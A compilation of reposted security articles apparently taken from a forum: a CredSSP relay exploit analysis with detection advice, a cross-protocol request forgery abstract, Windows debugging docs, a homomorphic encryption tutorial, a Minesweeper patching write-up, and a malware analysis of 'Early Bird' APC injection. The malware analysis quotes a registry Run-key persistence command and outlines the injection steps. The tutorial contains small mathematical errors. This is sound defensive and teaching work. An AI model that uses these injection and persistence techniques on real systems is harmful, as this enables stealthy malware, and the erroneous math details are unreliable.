Azure Advanced Threat Protection: CredSSP Exploit Analysis April 18, 2018 Azure Advanced Threat Protection Team This post is authored by Tal Maor, Security Researcher, Azure ATP. After announcing the release of Azure Advanced Threat Protection (Azure ATP) just a few weeks ago, we are excited to provide details on how Azure ATP has been updated to better protect customers against a new exploit by including the identity theft technique used in the Credential Security Support Provider (CredSSP) Protocol exploit as a flavor of the Pass-The-Ticket detection. In March, Microsoft released a patch for CVE-2018-0886, which protects against a vulnerability discovered by Preempt. The vulnerability allows attackers to perform authenticated remote code executions by taking advantage of the way CredSSP validates requests during the authentication process. In this blog, we provide network behavior analysis of the CredSSP exploitation of this vulnerability and the techniques it uses to propagate in the network. Additionally, we highlight how you can use Azure ATP to detect and investigate a variety of advanced cyberattack attempts. CredSSP exploitation analysis The CredSSP enables an application to securely delegate a user’s credentials from a client to a target server; any application that depends on CredSSP for authentication may be vulnerable to this type of attack. The CredSSP remote code execution vulnerability is also known as Kerberos relay attack using CredsSSP because it uses Kerberos to authenticate against the target and sign malicious payload. As an example of how an attacker would exploit this vulnerability against Remote Desktop Protocol, the attacker would need to run a specially crafted application and perform a man-in-the-middle attack against a Remote Desktop Protocol session. Main steps of standard CredSSP’s Kerberos U2U SSL negotiation – the RDP server returns its public certificate. The client requests from the Ticket Granting Service (TGS) for TERMSRV on the RDP server – this TGS won’t be used although it is retrieved. The client requests the Ticket Granting Ticket (TGT) which should be used as an additional ticket for granting TGS to the RDP server – this step is unique for the U2U mechanism. The client requests the Key Distribution Center (KDC) for U2U TGS for the RDP server (using the RDP client TGT from its initial AS request) and additional TGT of the RDP server (retrieved in step 3). The KDC first validates the authenticity of the requester using the RDP client TGT. Then it opens the RDP server TGT with the krbtgt long term key and uses the TGT session key for encrypting the requested TGS. The client receives the U2U TGS encrypted with the RDP server TGT session key, and TGS enc-part response encrypted with the RDP client TGT session key, both encrypted parts contain a new session key generated by the KDC for the new RDP connection. The client opens the TGS enc-part response and finds the session key with the RDP server. The client creates an AP request using the received TGS for the RDP connection and relevant session key (both retrieved in step c). This AP request also contains the RDP server public key (received in the SSL negotiation) encrypted with the negotiated session key, as “Channel Binding” of CredSSP to validate client authenticity. At this point, the authentication phase is over, and the encrypted RDP session was established. Main steps of the malicious CredSSP’s Kerberos U2U In this flow, the target is the Domain Controller that also runs RDP and RPC servers by default. Setting up the malicious RDP server RPC bind to the TaskSchedulerService interface with U2U Kerberos KERB-TGT-REQUEST. This will retrieve the relevant TGT for TERMSRV\dc1.domain1.test.local service. Waiting for the victim to connect via RDP 2. The RDP client initiates a secured TLS connection with the malicious RDP server and requests its public certificate. This time the malicious RDP server returns a malicious public certificate in clear text. The client uses the public key from the certificate to initiate an encrypted SSL connection and later signs the public key using the Kerberos session key (aka “Channel Binding”) as part of the last step of CredSSP in the Kerberos AP request. 3. The client requests TGS for TERMSRV on the malicious RDP server – this TGS won’t be used although it is retrieved. 4. The client requests the TGT which should be used as an additional ticket for granting TGS to the malicious RDP server – this step is unique for the U2U mechanism. 5. The client requests the KDC for U2U TGS (using the RDP client TGT from its normal AS) and additional TGT of the RDP server (retrieved in step 3). 6. The client creates an AP request, which includes the TGS for the RDP connection. This AP request also contains the malicious RDP server public key encrypted with the negotiated session key, that was meant to be the Channel Binding and is used by the malicious RDP server in the next steps. The malicious RDP server tries to authenticate the RPC session (initiated in step 0) by performing AP request with TGS and authenticator extracted from the original AP request of the victim. The DC will get this AP request as part of the RPC session and validated the received TGS and authenticator. 7. The malicious server sends the signed task scheduler request, which was sent to the victim as a public key (in step 0) and was returned signed by the victim (in step 6), over the authenticated RPC session to create malicious task successfully. Detection with Azure ATP This type of identity theft can be detected by Azure ATP as an identity theft using Pass-The-Ticket attack. Given that the Kerberos AP request from the attacker using the original clients TGS, Azure ATP will detect this malicious behavior and will create the following security alert: In addition, Azure ATP detects several Remote Code Execution techniques performed against the Domain Controller. Given that the RPC makes a call to create a task scheduler on the domain controller, the following security alert is created: When the two security alerts started concurrently and point to the same machine, this can point to the conclusion that this machine performed a remote malicious operation by using the theft identity like as the operation performed by the CredSSP exploit. We strongly recommend that customers who have not yet set the security update for CredSSP to do so as soon as possible. For more information on how to apply the patch please visit CredSSP updates for CVE-2018-0886. You can learn more about Azure ATP here, and when you are ready, start a trial! Additional Resources CredSSP updates for CVE-2018-0886 From Public Key to Exploitation: How We Exploited the Authentication in MS-RDP Security Advisory: Critical Vulnerability in CredSSP Allows Remote Code Execution on Servers Through MS-RDP (Video) CVE-2018-0886 | CredSSP Remote Code Execution Vulnerability How Kerberos user-to-user authentication works? Sursa: https://cloudblogs.microsoft.com/enterprisemobility/2018/04/18/azure-advanced-threat-protection-credssp-exploit-analysis/?_lrsc=5d41d863-5550-4519-99c6-495d29b52e92
-
Cross-Protocol Request Forgery Server-Side Request Forgery (SSRF) and Cross-Site Request Forgery (CSRF) are two attack methods that enable attackers to cross network boundaries in order to attack applications, but can only target applications that speak HTTP. Custom TCP protocols are everywhere: IoT devices, smartphones, databases, development software, internal web applications, and more. Often, these applications assume that no security is necessary because they are only accessible over the local network. This paper aims to be a definitive overview of attacks that allow cross-protocol exploitation of non-HTTP listeners using CSRF and SSRF, and also expands on the state of the art in these types of attacks to target length-specified protocols that were not previously thought to be exploitable. Download: https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/2018/cprf-1.pdf Published date: 10 April 2018 Sursa: https://www.nccgroup.trust/us/our-research/cross-protocol-request-forgery/?research=Whitepapers
-
- 1
-
-
Getting Started with Windows Debugging 11/28/2017 5 minutes to read Contributors This section covers how to get started with Windows Debugging. If your goal is to use the debugger to analyze a crash dump, see Crash dump analysis using the Windows debuggers (WinDbg). To get started with Windows Debugging, complete the following tasks. Determine which devices will serve as the host system and the target system. The debugger runs on the host system and the code that you want to debug runs on the target system. Host <--------------------------------------------------> Target Because it is common to stop instruction execution on the processor during debugging, typically, two systems are used. In some situations, it is possible that the second system is a virtual system, for example, a virtual PC that is running on the same PC. However, if your code is communicating to low level hardware, using a virtual PC may not be the best approach. For more information, see Setting Up Network Debugging of a Virtual Machine Host. Determine if you will be doing kernel or user mode debugging. Kernel mode - Kernel mode is the processor access mode in which the operating system and privileged programs run. Kernel mode code has permission to access any part of the system, and is not restricted like user mode code. It can gain access to any part of any other process running in either user mode or kernel mode. Much of the core OS functionality and many hardware device drivers run in kernel mode. User mode - Applications and subsystems run on the computer in user mode. Processes that run in user mode do so within their own virtual address spaces. They are restricted from gaining direct access to many parts of the system, including system hardware, memory that was not allocated for their use, and other portions of the system that might compromise system integrity. Because processes that run in user mode are effectively isolated from the system and other user mode processes, they cannot interfere with these resources. If your goal is to debug a driver, determine if the driver is a kernel mode driver (typically described as a WDM or KMDF driver) or a user mode driver (UMDF). For some issues, it can be difficult to determine which mode the code is executing in. In that case, you may need to pick one mode and look to see what information is available in that mode. Some issues require using the debugger in both user and kernel mode. Depending on what mode you decide to debug in, you will need to configure and use the debuggers in different ways. Some debug commands operate the same, and some commands operate differently in different modes. For information about using the debugger in kernel mode, see Getting Started with WinDbg (Kernel-Mode) and Debug Universal Drivers - Step by Step Lab (Echo Kernel-Mode) and Debug Drivers - Step by Step Lab (Sysvad Kernel-Mode). For information about using the debugger in user mode, see Getting Started with WinDbg (User-Mode). Chose your debugger environment. WinDbg works well in most situations, but there are times when you may want to use another debugger such as console debuggers for automation or even Visual Studio. For more information, see Debugging Environments. Determine how you will connect the target and host system. Typically, an Ethernet network connection is used to connect the target and host system. If you are doing early bring up work, or don't have an Ethernet connection on the device, other network connection options are available. For more information, see these topics: Setting Up Kernel-Mode Debugging Manually Setting Up Kernel-Mode Debugging over a Network Cable Manually Setting Up Kernel-Mode Debugging using Serial over USB Manually Setting Up Network Debugging of a Virtual Machine Host If you wish to debug using Visual Studio, then refer to these topics. Setting Up Kernel-Mode Debugging in Visual Studio Setting Up Kernel-Mode Debugging over a Network Cable in Visual Studio Setting Up Kernel-Mode Debugging using Serial over USB in Visual Studio Setting Up Kernel-Mode Debugging of a Virtual Machine in Visual Studio Setting Up User-Mode Debugging in Visual Studio Choose either the 32-bit or 64-bit debugging tools. This choice is dependent on the version of Windows that is running on the target and host systems and whether you are debugging 32-bit or 64-bit code. For more information, see Choosing the 32-Bit or 64-Bit Debugging Tools. Configure symbols. You must load the proper symbols to use all of the advanced functionality that WinDbg provides. If you do not have symbols properly configured, you will receive messages indicating that symbols are not available when you attempt to use functionality that is dependent on symbols. For more information, see Symbols for Windows debugging (WinDbg, KD, CDB, NTSD). Configure source code. If your goal is to debug your own source code, you will need to configure a path to your source code. For more information, see Source Path. Become familiar with debugger operation. The Debugger Operation section of the documentation describes debugger operation for various tasks. For example, the Loading Debugger Extension DLLs topic explains how to load debugger extensions. To learn more about working with WinDbg, see Debugging Using WinDbg. Become familiar with debugging techniques. Standard Debugging Techniques apply to most debugging scenarios, and examples include setting breakpoints, inspecting the call stack, and finding a memory leak. Specialized Debugging Techniques apply to particular technologies or types of code. Examples are Plug and Play debugging, Kernel Mode Driver Framework debugging, and RPC debugging. Use the debugger reference commands. Over time, you will use different debug commands as you work in the debugger. Use the .hh (Open HTML Help File) command in the debugger to display help information about any debug command. For more information about the available commands, see Debugger Reference. Use debugging extensions for specific technologies. There are a number of debugging extensions that provide parsing of domain specific data structures. For more information, see Specialized Extensions. This section contains the following topics. Getting Started with WinDbg (Kernel-Mode) Getting Started with WinDbg (User-Mode) Choosing the 32-Bit or 64-Bit Debugging Tools Debugging Environments Setting Up Debugging (Kernel-Mode and User-Mode) Debug Universal Drivers - Step by Step Lab (Echo Kernel-Mode) Debug Drivers - Step by Step Lab (Sysvad Kernel-Mode) Sursa: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/getting-started-with-windows-debugging?WT.mc_id=linkedin
-
April 13, 2018 Crypto Journal Part II : Homomorphic Encryption Starting Words This post covers homomorphic encryption with an introductory perspective then shows example of two schemes the math is kept to a minimum but some terms that are used a lot need to be explained at first , every paper is referenced at the end of the post . A Later blogpost will look at other schemes and discuss the idea of bootstraping circuits . Group : A Group in mathematics is the most basic algebraic structure , it’s simply a set (a bunch of numbers) and an operation (addition,multiplication…) that fits certain criterias or axioms . Modulo : Modulo is the operation in programming languages it results in the remainder of the integer division . Cyclic Group : A Cyclic Group is a group that can be generated from one element we call the generator imagine the group of powers of 2 {2^k} that’s a cyclic group it’s generator is 2 . Congruence: a = b (mod n) this reads a is congruent to b modulo n and simply means that a-b is a multiple of n . Finite Groups : a finite group is a group with a limited set ( a fixed number of elements ). Integers Modulo n : this is the most used types of groups in cryptography and this groups contains the number {0,1,2…, n-1} and all operation are modular . Modular arithmetic : we speak about modular operation for example modular addition when we do addtion in an integer modulo group , for example a clock uses modulo 12 addition . Modular multiplicative inverse : a modular multiplicative inverse of a number x is another number y such as xy = 1 mod n (the product xy is congruent to 1 modulo n) in simpler terms xy - 1 can be evenly divided by n Order of a group : the order of a group is the number of elements in it’s set . We won’t need this much math to get an idea and work some examples but having a concept or an idea of what these are will help on the long term, I recommend two books if you want to dive deeper in the mathematics . Introduction Homomorphic Encryption is based on the idea of homomorphisms in Group theory put it simply a homomorphism is a function that maps one group to another such that : f(a.b) = f(a).f(b) (1) consider the dot to be an operation (additon or multiplication for ex) . Homomorphic encryption is thus a structure/operation preserving encryption/mapping it’s use cases span across different areas for example electronic voting and machine learning anonymous location queries , search engines , cloud computing… the word homomorphism is constructed of homos which means same in Greek and morphe which stands for shape . Homomorphic Encryption Encryption is the science or art of transforming plain text messages to an “encrypted” form hidden , homomorphic encryption is a form of encryption in which the formula we stated above is correct in other words the “f” is an encryption algorithm and the encryption of the product of two numbers is equal to the product of the encryptions of the numbers : E(a.b) = E(a).E(b) E is an encryption algorithm or in more proprietary terms a scheme . Now as any kind of encryption we can describe two ways of doing it either by using Secret Key Encryption or Public Key Encryption the first uses one key to both encrypt and decrypt a message , the second uses a public key to encrypt and a private key to decrypt mathematically speaking they are both theoretically secure alas in the real world it’s hard to get it right and a scheme such as RSA can be easily broken if it’s not padded . RSA is actually the first public-key homomorphic encryption scheme but to achieve semantic security RSA needs to pad a message with random bits before ebcryption The padding results in RSA losing it’s homomorphic property so if you hear the words “RSA and Homomorphic Encryption” we are talking about unpadded RSA . An encryption algorithm is called homomorphic if it’s fills the property (1) for some kind of operation as we are going to see next some schemes are only homomorphic with respect to addtion , some to both addtion and multiplication and the messages are usually numbers . There are multiple schemes that separate into two what we call Somewhat Homomorphic and Fully Homomorphic . Somewhat Homomorphic : You are limited in the kind of operations you can do between to ciphertext , you can add two ciphertexts but you can’t multiply them or you can multiply a ciphertext with a plaintext . Fully Homomorphic : You can typically evaluate any kind of operations on ciphertexts the term was coined by Rivest in 1978 but Craig Gentry was the first to introduce a scheme that works on arbitrary functions in his Phd thesis “ Fully Homomorphic Encryption using Ideal Lattices” . Key Point : homomorphic encryption and in general is defined by the propert0y (1) , the dot operation can represent any operation as long as the formula holds correct for that operation it can be addition,multiplication or modular multiplication . N.B : Many Public Key based schemes are “probabilistic” meaning that if you encrypt the same message multiple times it will yield a different ciphertext thus they introduce randomness to hide the smallest partial information about the plain text what we call semantically secure . Examples Of Schemes In this section we introduce a few schemes and we show a few examples using small parameters and Python to describe this process . Note that the code is here is merely toy examples don’t use it in real life because as you will learn in cryptopals it’s hard to implement crypto . Paillier The Paillier scheme , was invented by Pascal Paillier in 1999 it’s a probabilistic scheme that is homomorphic with respect to addition ( the sum of two ciphertext is equal to the ciphertext of the sum of the two plaintext equivalents) and to multiplication by a constant . Suppose E is the paillier encryption function then we have the following two properties : E(a)+E(b) = E(a+b) E(a)^b = E(a * Paillier is composed of three algorithms in fact three algorithms are necessary to create an encryption scheme . First you need a Key generation algorithm, second an encryption algorithm and last a decryption algorithm let’s see how Paillier implement those . Key Generation To generate a key you choose two large primes p and q such that : gcd(pq,(p-1)(q-1)) = 1 In otherwords the product of p and q and (p-1) and (q-1) are relatively prime ( their greatest common divisor is 1) . Then you compute two parameters n & lambda such that : * n = pq and lambda = lcm(p-1,q-1) LCM is the least common multiple for example lcm(4.8) = 16 Select a random integer g such as g belongs to the set of integers modulo n squared . in this case (p and q are primes of the same length) you can pick g as n+1 Compute mu such as mu = lambda^-1 mod n (modular multiplicative inverse) The public key is (n,g) and the private key is (lambda,mu) Encryption suppose m is your message and r a random number such as : m < n and r < n c = g^m * r^n mod n^² c is the ciphertext of m Decryption m = L(c^lambda mod n^²) * mu mod n L(x) = (x-1) / n Example with small parameters and proof of homomorphism let p = 11 and q = 13 n = pq = 143 g = n+1 = 144 The public key is (143,144) Let’s encrypt the answer of the universe and send it to the Zorbs ( habitants of Zorbis planet ) m = 42 we pick r : r = 23 c = g^m * r^n (mod n^2) = 144^42 * 23^143 (mod 143^2) = 9637 m = L(c^lambda mod n^2) * mu mod n lambda = (p-1)*(q-1) = 10*12 = 120 mu = lambda^-1 mod n = 120^-1 mod 143 m = L(9637^120 mod 143^2) * (120^-1 mod 143) mod 143 m = 42 note that you should use modular inverse to compute mu Homomorphic Properties Now that we defined the the procedure to generate a keypair, encrypt and decrypt let’s discuss the homomorphic properties of Paillier . Addition : The product of two ciphertexts decrypts to their sum , if I want to do addition on ciphertexts relatively to my plaintexts I have to calculate the product of the ciphers Proof suppose E is the encryption algorithm and m1 and m2 the plaintexts : E(m1) * E(m2) = (g^m1*r1^n)(g^m2*r2^n) mod n^2 = g^(m1+m2) (r1r2)^n mod n^2 = E(m1+m2) Multiplication: If I have a plaintext m and a constant k then the encryption of their product evaluates to the cipher of m raised to the power k . Proof same suppositions about E,m1,m2 as before : E(m1)^m2 = (g^m1+r1^n)^m2 mod n^2 = g^(m1m2) (r1^m2)^n mod n^2 = E(m1m2) Python Example Implementation The following code can be used to run the example we made above using the same parameters # we need the inverse modulo operation def egcd(a, b): if a == 0: return (b, 0, 1) else: g, y, x = egcd(b % a, a) return (g, x - (b // a) * y, y) def modinv(a, m): g, x, y = egcd(a, m) if g != 1: raise Exception('modular inverse does not exist') else: return x % m # we also define the l function def l(u,n): return (u-1)/n # pick two primes p = 11 q = 13 # compute n n = p*q # pick g and since p and q are of the same length we can use n+1 g = n+1 # compute lambda lda = (p-1)*(q-1) # compute mu mu = modinv(lda,n) # declare a message m = 42 # pick r such as r<n r = 23 # compute the cipher text c = g**m * (r ** n % n ** 2) # let see the ciphertext print(c) # decrypt the ciphertext note the position of the parenthesis d = l(c**lda % n**2,n) * mu % n print(d) # let's make an addition k = 10 # encrypt k ck = g**k * (r**n % n**2) # decrypt and save k dk = l(ck**lda % n**2,n) * mu % n # verify E(m) * E(k) == E(m+k) cres = ck * c # decrypt result dres = l(cres**lda % n**2,n) * mu % n Ending Notes : I don’t think I treated every bit of the subject in this blogpost but the aim was to present and explain the ideas as clearly as possible for a more in depth treatment you can read the references below . Other schemes that are partially homomorphic are Elgamal ( yes the same one used by GNUPGP ), Goldwasser-Micali, and the Boneh-Goh-Nissim that operates on elliptic curves . I would like to thank Andrew Trask for his suggestions and taking time to read an early draft . References Abstract Algebra : A book of abstract algebra by Charles C.Pinter Number Theory : Summing it up by Avner Ash and Robert Gross Paillier Paper : PDF Gentry 2009 FHE using Ideal Lattices : Link Goldwasser-Mical : Wiki Boneh-Goh-Nissim : PDF Sursa: https://radicalrafi.github.io/posts/homomorphic-encryption/
-
Ophir Harpaz Apr 13 Put The Flags Out! — Hacking Minesweeper Background Two weeks from today, the first Low Level & Security Celebration will take place. This event is organized by Baot and its goal is to attract more women into the low level and security fields. I was given the amazing yet terrifying task of teaching the Reverse Engineering workshop. When I started planning the workshop’s last session — I had no idea what to do. I was looking for an interesting challenge that I could use in my workshop. A dear friend of mine, Aviad Carmel, is a super-skilled reverser and my reverse engineering mentor. He suggested that I hacked Minesweeper, such that when Minesweeper starts up, all mines are marked with flags. It took me one week, tens of hours, many Windows API Google-searches and way too many breakpoints to finish, but I finally did it. I was so excited I had to tweet something, which proved as a great thing to do as I received many likes, comments, retweets and GitHub-link requests. I even got to know a very talented, young researcher who (in a strange coincidence) hacked Minesweeper too and published his own post about it! But that was all intro — let’s get to the point. I am about to do 2 things in this post: show you the hard, long, Sisyphean way I took in order to solve the challenge; tease you with two follow-up challenges. Let’s go. I Did It My Way As I just said, my way took forever, or so it felt like. I went from IDA to OllyDbg and back to IDA, put breakpoints on every suspicious line, filled my notebook with addresses I later forgot and basically got lost. a lot. Aviad noticed my frustration and wrote me something on WhatsApp which I then scribbled on a sticky note right below my screen: The most important thing is to persist, to not give up, truly believe that there is no chance for the computer to beat you. There is no such thing as “difficult”, perhaps just “takes more time”. Aviad’s words and a cup of coffee keep me highly-motivated. My strategy went something like this: Find the code that draws a flag upon a right-click (let’s call this function draw_flag). Find the code that draws the board, (let’s call this function draw_board). Change the function draw_board such that whenever a mined square is met — draw_flag is called with the proper parameters. It was tedious, but eventually I found the line that draws a flag on a square when it is right-clicked on. When stepping over this line with an F8 — the flag immediately appeared on the board. The highlighted line is the one that draws a flag on a square. According to MSDN, the function on this line — BitBlt — “performs a bit-block transfer of the color data corresponding to a rectangle of pixels from the specified source device context into a destination device context”. HUH?! This was Greek to me but I guessed that the function copied pixels from a source to a destination and that source device context was the argument I cared about. The value of this hSrcDC argument is fetched from an array located at 1005A20, using an offset which is stored in the EDX register. When drawing a flag, this offset equals 0x0E (see the screenshot above and notice line 1002676 and the EDX register). My next guess was that this BitBlt function was used not only to draw a flag, but to draw a mine or an empty square as well. I used IDA’s xrefs (cross-references) feature to detect where BitBlt is used elsewhere: I went to the second location in the code where BitBlt was called. To my pleasant surprise, the call appeared in a block which was a part of a loop. This strengthened my assumption that the initial board was drawn using this function. This time, the value of hSrcDC was set by accessing the same hdcSrc array with an offset stored in EAX. Examining the value of EAX, I could say that: EAX = *(EBX + ESI) & 1F 0x1F is a literal, but what are EBX and ESI? Looking at the two blocks before, I saw that EBX was a fixed location in memory (1005360) and ESI was the loop variable. I examined the address 1005360 in memory and found something that looked a lot like a mine-field: I noticed two things: Each pair of 0x10’s is exactly 9-bytes distant. So 0x10 must be a delimiter for rows on the board. There were exactly ten 0x8F’s, which suggested that 0x8F is a value representing mines. This left 0x0F to represent an empty square. By ANDing with 0x1F on line 10026E9 (see IDA screenshot), both 0x0F and 0x8F end up being 0x0F, but I wanted them to be 0x0E, remember?😉 This AND instruction was too strict and it was the key to what I was trying to achieve. I needed to make this AND instruction more flexible and take into consideration the value of the currently-processed square. The logic I wanted to implement was this: if board_location[square_position] == 0x8F: draw_flag else: draw_empty_square The existing AND instruction takes 3 bytes of opcode. My logic was way beyond 3 bytes. I needed a code-cave to my rescue. I searched the executable file for a slot in the code section with enough null bytes which I could replace with my own code. Using a hex-editor and a nice online assembler, I added my opcodes, corresponding to the following x86 instruction sequence: 1004A60 CMP AL, 8F 1004A62 JNZ SHORT patched_minesweeper.01004A66 1004A64 MOV AL, 0E 1004A66 PUSH DWORD PTR DS:[EAX*4+1005A20] 1004A6D JMP patched_minesweeper.010026F3 Notice how this assembly code implements the pseudo-code from above: AL is compared to 0x8F (a mine value). If it is not a mine, go on with the original code, namely draw an empty square. If it is a mine, replace 0x8F with 0x0E (the value required for drawing a flag). In order to run my new code, I needed to use a JMP instruction from the original code. But even the JMP opcode takes more than 3 bytes, meaning I had to override not only the AND instruction but also the one following it. I padded the remaining bytes with NOPs and added the overridden instruction to my patch (see line 1004A66 above). So the original code was modified to look like this: 010026E9 JMP patched_minesweeper.01004A60 010026EE NOP 010026EF NOP 010026F0 NOP 010026F1 NOP 010026F2 NOP Minesweeper was now patched to mark mines with flags. The end. You will Do It the Other Way Now the fun part. When I talked to Aviad to share my solution, he told me that I had taken a long and winding road. Apparently, there is a hack which is significantly more elegant and efficient than what I did. If you want to give it a try, please do. Here are 2 hints: It’s a one-liner. Namely, you can change one line only to make the game start with flags on all mined squares. Instead of changing how the mine-field is printed, change the mine-field itself. How would you create it if you were the Minesweeper programmer? One Last Riddle When I opened my patched version of Minesweeper, I wanted to perform a sanity check. I clicked on a flag and expected the game to be over (since flags mark mines). That didn’t happen, and the game was over only after clicking on a second flag. Why? You are more than welcome to contact me for questions, notes, suggestions, etc. Good luck and thanks for reading :) Sursa: https://medium.com/@ophirharpaz/put-the-flags-out-hacking-minesweeper-befff233edc1
-
New ‘Early Bird’ Code Injection Technique Discovered Hod Gavriel, Boris Erbesfeld | Apr 11, 2018 This injection technique allows the injected code to run before the entry point of the main thread of the process, thereby allowing to avoid detection by anti-malware products’ hooks. Code injection is commonly used by malware to evade detection by injecting a malicious code into a legitimate process. This way the legitimate process serves as camouflage so all anti-malware tools can see running is the legitimate process and thus obfuscates the malicious code execution. We researched a code injection technique that appeared in malware samples at the Cyberbit malware research lab. It is a simple yet powerful code injection technique. Its stealth allows execution of malicious code before the entry point of the main thread of a process, hence – it can bypass security product hooks if they are not placed before the main thread has its execution resumed. But before the execution of the code of that thread, the APC executes. Click to watch code injection video We saw this technique used by various malware. Among them – the “TurnedUp” backdoor written by APT33 – An Iranian hackers group, A variant of the notorious “Carberp” banking malware and by the DorkBot malware. The malware code injection flow works as follows: Create a suspended process (most likely to be a legitimate windows process) Allocate and write malicious code into that process Queue an asynchronous procedure call (APC) to that process Resume the main thread of the process to execute the APC Hooks are code sections that are inserted by legitimate anti-malware products when a process starts running. They are placed on specific Windows API calls. The goal of the hooks is to monitor API calls with their parameters to find malicious calls or call patterns. In this post, we explain how APC execution flow works within a resume of a suspended process. This code injection technique can be drawn like this: Synopsys of Technical Analysis of Early Bird Code Injection Technique While analyzing samples at our lab, we came across a very interesting malware sample (SHA256: 9173b5a1c2ca928dfa821fb1502470c7f13b66ac2a1638361fda141b4547b792) It starts with the .net sample deobfuscating itself, then performing process hollowing and filling the hollowed process with a native Windows image. The native Windows image injects into the explorer.exe process. The payload inside explorer.exe creates a suspended process – svchost.exe and injects into it. The sample consists of three different injection methods (We consider process hollowing to be an injection technique as well). The SHA256 of the payload inside svchost.exe is c54b92a86c9051172954fd64573dd1b9a5e950d3ebc581d02c8213c01bd6bf14. As of 20 March 2018, this payload was signed by only 29 out of 62 anti-malware vendors. The original sample, which dates back to 2014, was signed by 47 out of 62 vendors. While the process hollowing and the second injection into explorer.exe are trivial, the 3rd technique caught our attention. Let’s have a look at the debugger before the injection to svchost.exe happens. Figure 1 – A suspended svchost.exe process is created At this point the malware creates a suspended svchost.exe process. Common legitimate Windows processes are among malwares’ favorite choices. svchost.exe is a Windows process designated to host services. After creating the process, the malware allocates memory in it and writes a code in the allocated memory region. To execute this code, it calls NtQueueApcThread to queue an asynchronous procedure call (APC) on the main thread of svchost.exe. Next, it calls NtResumeThread to decrease the suspend count of that thread to zero, consequently the main thread of svchost.exe will resume execution – if this thread in alertable state, the APC will execute first. Figure 2 – Queuing an APC to svchost.exe main thread and resuming the thread When queuing an APC to a thread, the thread must be in an alertable state in order for that APC to execute. According to the Microsoft documentation: “When a user-mode APC is queued, the thread to which it is queued is not directed to call the APC function unless it is in an alertable state. A thread enters an alertable state when it calls the SleepEx, SignalObjectAndWait, MsgWaitForMultipleObjectsEx, WaitForMultipleObjectsEx, or WaitForSingleObjectEx function” But the thread has not even started its execution since the process was created in a suspended state. How does the malware “know” that this thread will be alertable at some point? Does this method work exclusively on svchost.exe or will it always work when a process is created in a suspended state? To check this out, we patched the malware so it will inject to other processes of our choice and witnessed it also working with various other processes. We went further to research what is going on when a main thread is resumed after its process is created in a suspended state. By putting a breakpoint on the call to NtQueueApcThread, we can see the APC address on svchost.exe is at 0x00062f5b. We attached a debugger to this process and put a breakpoint on that address. Here is what the svchost.exe process looks like at 0x000625fb (start address of the APC). Figure 3 – The APC starts execution at svchost.exe Let’s look at the call stack (figure 4) after resuming the thread. Our breakpoint on 0x00062f5b was hit as expected: Figure 4 – The call stack of svchost.exe We first have to note that every user-mode thread begins its execution at the LdrInitializeThunk function. When we look at the bottom of the call stack we see that LdrpInitialize, which is called from LdrInitializeThunk (figure 5), was called. We trace into LdrpInitialize and see that it jumps to the function _LdrpInitialize (figure 6). Inside _LdrpInitialize, we see a call to NtTestAlert (figure 7) which is a function responsible for checking if there is an APC queued to the current thread – if there is one – it notifies the kernel. Before returning to user-mode, the kernel prepares the user-mode thread to jump to KiUserApcDispatcher which will execute the malicious code in our case. Figure 5 – 0x76e539c1 led to an address after the call from LdrpInitialize Figure 6 – Inside LdrpInitialize there is a jump to _LdrpInitialize Figure 7 – Inside _LdrpInitialize there is a call to NtTestAlert We can see evidence that this APC was executed by KiUserApcDispatcher (figure 8), by looking at the call stack again, and see that the return address of 0x00062f5b is 0x76e36f9d – right after the call from KiUserApcDispatcher. Figure 8 – KiUserApcDispatcher executed the APC To sum it up, the execution flow that led to the execution of the APC is: LdrInitializeThunk → LdrpInitialize → _LdrpInitialize → NtTestAlert → KiUserApcDispatcher An important note about this injection method is that it loads the malicious code in a very early stage of thread initialization, before many security products place their hooks – which allows the malware to perform its malicious actions without being detected. In the wild This technique was seen in other samples in our lab (SHA 256): 165c6f0b229ef3c752bb727b4ea99d2b1f8074bbb45125fbd7d887cba44e5fa8 368b09f790860e6bb475b684258ef215193e6f4e91326d73fd3ab3f240aedddb a82c9123c12957ef853f22cbdf6656194956620d486a4b37f5d2767f8d33dc4d d17dce48fbe81eddf296466c7c5bb9e22c39183ee9828c1777015c1652919c30 5e4a563df904b1981d610e772effcb005a2fd9f40e569b65314cef37ba0cf0c7 The last two samples in this list are the most recent, dated from 31 October 2017. These samples are the “TurnedUp” backdoor written by the Iranian hackers group APT33. Figure 9 is a screenshot from the last sample which shows the use of this technique in an injection to rundll32.exe – a legitimate Windows process used to run exported functions from dll files. Figure 9 – A suspended rundll32.exe process is created, followed by injection using QueueUserApc In this sample, the APC is used to maintain persistence on the system. In figure 10 you can see where the APC starts (0x90000) inside rundll32.exe. Going just a bit further reveals that the malware will write a key to the Windows registry to maintain persistence by executing ShellExecuteA with cmd and a specific command (figure 11). The cmd command is: “/c REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v RESTART_STICKY_NOTESS /f /t REG_SZ /d \”C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\StikyNote.exe\””\ In this case, if a hook on ShellExecuteA was placed after the APC was called, this ‘Early Bird’ call and its parameters will sneak by before the hook, hence, failing to detect an important malware behavior. Figure 10 – APC starts execution at rundll32.exe Figure 11 – The call to ShellExecuteA The third sample in the list (a82c9123c12957ef853f22cbdf6656194956620d486a4b37f5d2767f8d33dc4d) dates back to 2011 and is variant D of the notorious Carberp malware. Cyberbit provides an Endpoint Detection and Response solution (EDR) which successfully detects the ‘Early Bird’ injection technique. To learn more visit the Cyberbit EDR page. Analysis of ‘Early Bird’ injection automatically created by Cyberbit EDR Hod Gavriel is a malware analyst at Cyberbit. Boris Erbesfeld is a principal software engineer at Cyberbit. Learn more about Cyberbit EDR Kernel-Based Endpoint Detection vs. Whitelisting Sursa: https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/
-
